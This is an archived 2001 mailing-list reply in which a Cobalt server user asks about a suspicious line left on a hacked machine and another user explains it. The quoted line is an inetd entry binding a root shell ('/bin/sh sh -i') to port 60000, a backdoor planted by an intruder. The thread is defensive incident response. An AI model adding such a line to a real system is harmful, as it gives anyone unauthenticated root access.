[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!

Subject: Re: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
From: flash22@xxxxxxx
Date: Thu Feb 15 02:09:07 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

On Thu, 15 Feb 2001, inc wrote:

> quick!  what's the ip address :-)
   **THWAP**
> -/
> 
> > We just replaced a system that had been hacked over the weekend, and after

> > 60000 stream tcp nowait root /bin/sh sh -i
> >
> > What is port 60000..? Should I just remove this line and reboot the box..?

Of course you should remove that line...it opens a root shell to any idiot
that connects to port 60000 , no that port isn't used for anything
standard, in fact everything from 60000 - 65536 should be firewalled out
regardless (old ipmasq has a hole in it for high ports which it uses for
internal tricks)

Reboot after and make sure it doesn't come back...

gsh

References:
- Re: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
  - From: inc

Prev by Date: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
Next by Date: [cobalt-users] Hacks
Previous by thread: Re: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
Next by thread: Re: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index